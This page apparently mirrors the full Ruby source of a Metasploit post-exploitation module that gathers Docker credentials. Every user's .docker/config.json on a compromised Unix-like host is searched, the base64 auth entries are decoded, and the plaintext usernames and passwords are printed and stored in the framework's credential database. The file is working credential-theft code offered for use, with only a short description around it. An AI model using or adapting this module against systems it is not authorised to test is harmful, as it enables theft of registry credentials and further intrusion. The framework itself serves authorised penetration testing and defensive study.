Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/gather/docker_creds.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'json'

7


8
class MetasploitModule < Msf::Post

9
  include Msf::Post::File

10
  include Msf::Post::Unix

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Multi Gather Docker Credentials Collection',

17
        'Description' => %q{

18
          This module will collect the contents of all users' .docker directories on the targeted

19
          machine. If the user has already push to docker hub, chances are that the password was

20
          saved in base64 (default behavior).

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => ['Flibustier'],

24
        'Platform' => %w[bsd linux osx unix],

25
        'SessionTypes' => ['shell'],

26
        'Notes' => {

27
          'Stability' => [CRASH_SAFE],

28
          'SideEffects' => [],

29
          'Reliability' => []

30
        }

31
      )

32
    )

33
  end

34


35
  # This module is largely based on gpg_creds.rb.

36


37
  def run

38
    print_status('Finding .docker directories')

39
    paths = enum_user_directories.map { |d| d + '/.docker' }

40
    # Array#select! is only in 1.9

41
    paths = paths.select { |d| directory?(d) }

42


43
    if paths.nil? || paths.empty?

44
      print_error('No users found with a .docker directory')

45
      return

46
    end

47


48
    download_loot(paths)

49
  end

50


51
  def download_loot(paths)

52
    print_status("Looting #{paths.count} directories")

53
    paths.each do |path|

54
      path.chomp!

55
      file = 'config.json'

56
      target = "#{path}/#{file}"

57


58
      if file? target

59
        print_status("Downloading #{target} -> #{file}")

60
        extract(target)

61
      end

62
    end

63
  end

64


65
  def extract(target)

66
    file = read_file(target)

67
    parsed = JSON.parse(file)

68
    if parsed['auths']

69
      parsed['auths'].each do |key, value|

70
        vprint_status("key: #{key}")

71
        value.each do |k, v|

72
          next unless k == 'auth'

73


74
          plain = Rex::Text.decode_base64(v)

75
          next unless plain.include? ':'

76


77
          print_good("Found #{plain}")

78
          username, password = plain.split(':')

79
          credential_data = {

80
            origin_type: :import,

81
            module_fullname: fullname,

82
            filename: target,

83
            workspace_id: myworkspace_id,

84
            service_name: 'docker',

85
            realm_value: key,

86
            realm_key: Metasploit::Model::Realm::Key::WILDCARD,

87
            private_type: :password,

88
            private_data: password,

89
            username: username

90
          }

91
          create_credential(credential_data)

92


93
          print_good('Saved credentials')

94
        end

95
      end

96
    else

97
      print_status('No credentials found in config file')

98
    end

99
  end

100
end

101


102